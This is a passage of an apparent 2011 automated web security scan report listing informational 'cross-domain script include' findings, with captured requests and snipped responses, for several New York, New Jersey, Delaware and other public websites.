X-Powered-By: PHP/5.3.4
Set-Cookie: SESS5d506fc80e0e90dcab3fa28ac30949e1=s7maojbbsjalvugal99t5oad66; expires=Fri, 05-Aug-2011 05:24:35 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:03 GMT
ETag: "b64f70a6778aaba742ca2cb12822f6ab"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.30. http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webreflection.blogspot.com
Path:   /2009/01/32-bytes-to-know-if-your-browser-is-ie.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2009/01/32-bytes-to-know-if-your-browser-is-ie.html HTTP/1.1
Host: webreflection.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Wed, 13 Jul 2011 01:51:16 GMT
Date: Wed, 13 Jul 2011 01:51:16 GMT
Cache-Control: private, max-age=0
Last-Modified: Tue, 12 Jul 2011 23:32:03 GMT
ETag: "2176f134-56cc-4cf9-b732-71a44fad7bd2"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/WebReflection" />

<script type="text/javascript" src="http://www.3site.eu/JSL/JSL.php"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/bigdollar.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/JSHighLighter.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/blog.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/GoogleTranslator.js"></script>

<script type="text/javascript" src="http://www.3site.eu/JPU/JPU.js"><!--// JPU - by WebReflection //--></script>
<script type="text/javascript" src="http://www.3site.eu/javascript/GuruMeditation.js"><!--// (C) Andrea Giammarchi //--></script>
<script type="text/javascript" src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.3site.eu/examples/jSmile.js"><!--// JSmile - by WebReflection //-->
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.blogger.com/dyn-css/authorization.css?targetBlogID=34454975&zx=2176f134-56cc-4cf9-b732-71a44fad7bd2"/><script type="text/javascript" src="http://www.blogger.com/static/v1/v-js/979395223-backlink.js"></script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/v-js/1895108979-backlink_control.js"></script>
...[SNIP]...
<dl id="comments-block">
<script type="text/javascript" src="http://www.blogger.com/dyn-js/backlink.js?blogID=34454975&postID=2004340713960404802" charset="utf-8" defer="true">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>


</div>


<script type="text/javascript" src="http://www.ubuntu.com/files/countdown/display2.js"></script>
...[SNIP]...
</ul>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"><!--// Google Analytics //-->
...[SNIP]...
</script>
<script src="http://badge.facebook.com/badge/1070526700.33.897046733.js"></script>
...[SNIP]...
<!-- End #footer -->
<script type="text/javascript" src="http://embed.technorati.com/embed/bzftjmf2gh.js"><!--// andr3a @ Technorati //--></script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/1436446111-csitail.js"></script>
...[SNIP]...

13.31. http://www.cio.ny.gov/universal_broadband  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cio.ny.gov
Path:   /universal_broadband

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /universal_broadband HTTP/1.1
Host: www.cio.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS6ae10ccb72afca1d3adad0f3130a2f0b=cggsua31kb710f7fs301ku2ui4; expires=Fri, 05-Aug-2011 05:24:42 GMT; path=/; domain=.cio.ny.gov
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:51:22 GMT
Cache-Control: must-revalidate
Connection: close
Content-Length: 34252
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web01; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<div>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

13.32. http://www.cs.state.ny.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cs.state.ny.us
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.cs.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:29 GMT
Server: Apache
Set-Cookie: CFID=38248036;expires=Fri, 05-Jul-2041 01:51:29 GMT;path=/
Set-Cookie: CFTOKEN=85624385;expires=Fri, 05-Jul-2041 01:51:29 GMT;path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5938


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">


<html lang="en-US">
<head>
   <title>New York State Department of Civil Service</title>
   <meta
...[SNIP]...
</script>
   <script type="text/javascript" src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.33. http://www.delaware.gov/apps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delaware.gov
Path:   /apps/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /apps/ HTTP/1.1
Host: www.delaware.gov
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcspersistslider1=1; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522360152:ss=1310522357519

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:55:18 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27398

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
       <head>
       <!-- Global meta tags, external stylesheets and scripts -->
       <met
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script language="javascript" type="text/javascript" src="http://server.iad.liveperson.net/hc/33511087/x.js?cmd=file&amp;file=chatScript3&amp;site=33511087"> </script>
...[SNIP]...

13.34. http://www.delaware.gov/topics/yourgovernment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delaware.gov
Path:   /topics/yourgovernment

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /topics/yourgovernment HTTP/1.1
Host: www.delaware.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522436140:ss=1310522357519; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522455746:ss=1310522357519; fcspersistslider1=2

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:57:10 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Location: yourgovernment.shtml
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30180

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<!-- Global meta tags, external stylesheets and scripts -->
<meta
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script language="javascript" type="text/javascript" src="http://server.iad.liveperson.net/hc/33511087/x.js?cmd=file&amp;file=chatScript3&amp;site=33511087"> </script>
...[SNIP]...

13.35. http://www.destateparks.com/fees/entry/annual-pass.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.destateparks.com
Path:   /fees/entry/annual-pass.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fees/entry/annual-pass.asp HTTP/1.1
Host: www.destateparks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Wed, 13 Jul 2011 02:01:35 GMT
Content-Length: 18645


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<div class="twittercontainer">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://assets.flashstall.com/js/swfobject-2.2.js"></script>
...[SNIP]...

13.36. http://www.dos.state.ny.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dos.state.ny.us
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.dos.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 29096
Content-Type: text/html
Content-Location: http://www.dos.state.ny.us/index.html
Last-Modified: Fri, 08 Jul 2011 13:42:25 GMT
Accept-Ranges: bytes
ETag: "ef9119df743dcc1:4a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:51:29 GMT
Connection: close

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New York State Department of State</title>

<link href="css/nav02.css" rel="stylesheet" t
...[SNIP]...
</div>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

13.37. http://www.facebook.com/NewJerseyLottery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /NewJerseyLottery

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /NewJerseyLottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=I_ocTk6Zw7qrIicWqdkAsyEn; expires=Fri, 12-Jul-2013 01:51:31 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=pn98H; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.10.42
Connection: close
Date: Wed, 13 Jul 2011 01:51:31 GMT
Content-Length: 34241

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/lJ-8GDk_1P7.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js"></script>
...[SNIP]...

13.38. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.4.47
X-Cnection: close
Date: Wed, 13 Jul 2011 01:59:39 GMT
Content-Length: 7946

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/OWWAkKnpuow.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js"></script>
...[SNIP]...

13.39. http://www.iloveny.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloveny.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.iloveny.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 78528
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=hlgm1aj0dc4o1s55anwpet45; path=/; HttpOnly
Set-Cookie: .ILNY_AUTH=uu2GJeV09wyGQ6aKghViELP9N9Dm8hBnLsRRZ2GAG/fsaDejtDcfVW2M/fqVMdr2uAyxABndZtAy4ZnoZfLalSWT1/zyZMiJhGMHBviCGrddJMhVv5SnPrdb61MOKmiL4PjIZbT58V9/+gxlYTPHZ7yjq2xkG54L2nIaLPAHpsjdo469gG514Xi7B7i0wEB8GfR2Fz+P7VN9wLZ8dVkqiglp3tyNiQP96vRWZb/Qo1uSbo2Y9j8/7pdWILKC3zWhgf0oNcVbu71K1ZxM8kp/d16xMFGCq4Zbo1v6p0+eH2gKPvycUOCiM+MhD0EtymLNkSNnJcNHePxLugEelU5Dd0B4T+YRO6Ae9Yft8Dh919ZDp/VLj47hojdjxMpUGh97FPVtcr2J6z+5OGkuMFY8xBn0dhc/j+1T9Jj7faoCA3xi/xApnGc4r51R7EQro889/TpWey+c0aB0fXwvpuFsR7mXIoJ30owZ0yVV39DPO+KW26DuRndG1Td9i9o9LlIRnAKVCRGAKBn/l9lP37McD9zxnwWjwDYCvGl2pMn8tYz17c7yZ+ZWT3+sTJAG9JCy/5fZT9+zHA/KvqWBbVOIddlQ1mLRKaNpN32L2j0uUhFO4HJj72uJONlQ1mLRKaNpa35ox231RPbJMqqETDfFxtjTF9BaLMFWyEKfT5D5F2X3GARRWbeuBg==; expires=Wed, 13-Jul-2011 03:21:37 GMT; path=/
Date: Wed, 13 Jul 2011 01:51:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us">

<head id="He
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=esdny"></script>

<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAA7-hefdT1azWatvEXjgirLRSUE6bbTfscIVqxKVfUgy5SoqltzhTzKDMe-FqxWjqjUnX9zefPt6DKVA" type="text/javascript"></script>
...[SNIP]...
<!-- Begin: 4q.iperceptions.com-->
<script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=8a273f8f-7676-c08732c6-dedb-4d7f-9d31-894dd71fe8ef&lID=1&loc=4q-web2" type="text/javascript" defer="defer"></script>
...[SNIP]...

13.40. http://www.labor.state.ny.us/ui/ui_index.shtm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.labor.state.ny.us
Path:   /ui/ui_index.shtm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ui/ui_index.shtm HTTP/1.1
Host: www.labor.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:52:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29320
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Unem
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=nysdol"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="Javascript" src="http://www.labor.ny.gov/sites/home/assets/js/content-utility.js"></script> <!-- absolutely referenced to access from SitePublisher in DEV -->
<script type="text/javascript" language="Javascript" src="http://www.labor.ny.gov/sites/home/assets/js/modal-video/linkvideo2.js"></script>
...[SNIP]...
</div>
<script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.41. http://www.louise.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.louise.house.gov
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.louise.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:57 GMT
Server: Apache
Set-Cookie: ce12a43d31101321362cf131b5cb4bf5=2m8kqb9hvsqs9ciisr3ds8m881; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:50:58 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 65651
Connection: close
Content-Type: text/html; charset=utf-8


<!doctype html>

<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" clas
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=RepHoyer&amp;headerbg=%23000099&amp;inactivebg=%23CCCCCC&amp;inactivefg=%23454545&amp;linkfg=%23AB0909"></script>
...[SNIP]...

13.42. http://www.nj.gov/njbusiness/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nj.gov
Path:   /njbusiness/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /njbusiness/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:51 GMT
Content-type: text/html
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<he
...[SNIP]...
</script><script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit" type="text/javascript"></script>
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.43. http://www.nj.gov/njbusiness/licenses/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nj.gov
Path:   /njbusiness/licenses/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /njbusiness/licenses/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:52 GMT
Content-type: text/html
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NJ Business P
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.44. http://www.nj.gov/njbusiness/registration/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nj.gov
Path:   /njbusiness/registration/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /njbusiness/registration/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:53 GMT
Content-type: text/html
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NJ Business P
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.45. http://www.nj.gov/njbusiness/starting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nj.gov
Path:   /njbusiness/starting/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /njbusiness/starting/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:52 GMT
Content-type: text/html
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NJ Business P
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.46. http://www.nj.gov/njbusiness/tax/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nj.gov
Path:   /njbusiness/tax/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /njbusiness/tax/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:53 GMT
Content-type: text/html
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NJ Business P
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.47. http://www.nj.gov/njbusiness/workforce/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nj.gov
Path:   /njbusiness/workforce/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /njbusiness/workforce/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:52 GMT
Content-type: text/html
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NJ Business P
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.48. http://www.nysenate.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nysenate.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.nysenate.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1310521787"
Cache-Control: public, max-age=300
Last-Modified: Wed, 13 Jul 2011 01:49:47 GMT
X-AH-Environment: prod
Cache-Control: s-maxage=10
Content-Length: 69987
Date: Wed, 13 Jul 2011 01:50:14 GMT
X-Varnish: 1926341654 1926340181
Age: 25
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<script src="http://assets.percentmobile.com/percent_mobile.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
